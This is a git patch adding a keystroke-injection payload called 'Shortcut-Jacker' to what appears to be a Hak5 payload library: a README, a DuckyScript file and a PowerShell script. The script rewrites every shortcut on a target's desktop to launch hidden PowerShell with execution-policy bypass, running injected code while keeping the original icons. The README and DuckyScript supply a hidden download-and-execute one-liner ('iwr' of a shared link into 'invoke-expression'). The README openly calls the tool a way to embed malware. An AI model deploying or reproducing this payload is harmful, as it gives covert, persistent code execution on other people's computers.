From d8fe119ed1fe4a42984212b45d79096a4b7c0efc Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 10 Oct 2022 23:35:38 -0500 Subject: [PATCH] Add files via upload --- .../execution/-OMG-ShortcutJacker/README.md | 144 ++++++++++++++++++ .../Shortcut-Jacker-Execute.txt | 15 ++ .../-OMG-ShortcutJacker/Shortcut-Jacker.ps1 | 118 ++++++++++++++ 3 files changed, 277 insertions(+) create mode 100644 payloads/library/execution/-OMG-ShortcutJacker/README.md create mode 100644 payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt create mode 100644 payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1 diff --git a/payloads/library/execution/-OMG-ShortcutJacker/README.md b/payloads/library/execution/-OMG-ShortcutJacker/README.md new file mode 100644 index 0000000..5fab7e1 --- /dev/null +++ b/payloads/library/execution/-OMG-ShortcutJacker/README.md @@ -0,0 +1,144 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Shortcut Jacker + +

+ + Python + +
YouTube Tutorial +

+ +A script used to embed malware in the shortcut on your targets desktop + +## Description + +This payload will run a powershell script in the background of any shortcut used on the targets desktop + +This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run. + +This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run. + +So if your command exceeds that consider using an IWR function to download and execute a longer script. + +I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) + + + +Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored. + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + + + +--------------------------------------------------------------------------------------------------------------------------------------------------------- + +Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field. + + + +## Getting Started + +Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Golang + +
Instagram + 		+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt new file mode 100644 index 0000000..cad1fd3 --- /dev/null +++ b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt @@ -0,0 +1,15 @@ +REM Title: Shortcut-Jacker + +REM Author: I am Jakoby + +REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr ?dl=1; invoke-expression $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly diff --git a/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1 b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1 new file mode 100644 index 0000000..88de451 --- /dev/null +++ b/payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker.ps1 @@ -0,0 +1,118 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This is payload used to inject powershell code into shortcuts + +.DESCRIPTION + This payload will gather information on the shortcuts on your targets desktop + That data will then be manipulated to embed a powershell script + This script will be ran in the background when the short cut is + +#> + +############################################################################################################################################################ + +<# +.NOTES + The powershell code stored in this variable is what will run in the background + This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code + variable and it will still run. +#> + +$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')" + +############################################################################################################################################################ + +function Get-Shortcut { + param( + $path = $null + ) + + $obj = New-Object -ComObject WScript.Shell + + if ($path -eq $null) { + $pathUser = [System.Environment]::GetFolderPath('StartMenu') + $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu') + $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse + } + if ($path -is [string]) { + $path = dir $path -Filter *.lnk + } + $path | ForEach-Object { + if ($_ -is [string]) { + $_ = dir $_ -Filter *.lnk + } + if ($_) { + $link = $obj.CreateShortcut($_.FullName) + + $info = @{} + $info.Hotkey = $link.Hotkey + $info.TargetPath = $link.TargetPath + $info.LinkPath = $link.FullName + $info.Arguments = $link.Arguments + $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'} + $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'} + $info.WindowStyle = $link.WindowStyle + $info.IconLocation = $link.IconLocation + + return $info + } + } +} + +#----------------------------------------------------------------------------------------------------------- + +function Set-Shortcut { + param( + [Parameter(ValueFromPipelineByPropertyName=$true)] + $LinkPath, + $IconLocation, + $Arguments, + $TargetPath + ) + begin { + $shell = New-Object -ComObject WScript.Shell + } + + process { + $link = $shell.CreateShortcut($LinkPath) + + $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() | + Where-Object { $_.key -ne 'LinkPath' } | + ForEach-Object { $link.$($_.key) = $_.value } + $link.Save() + } +} + +#----------------------------------------------------------------------------------------------------------- + +function hijack{ +$Link = $i.LinkPath +$Loc = $i.IconLocation +$TargetPath = $i.TargetPath +if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"} +$Target = $i.Target +if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"} +} + +#----------------------------------------------------------------------------------------------------------- + +Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}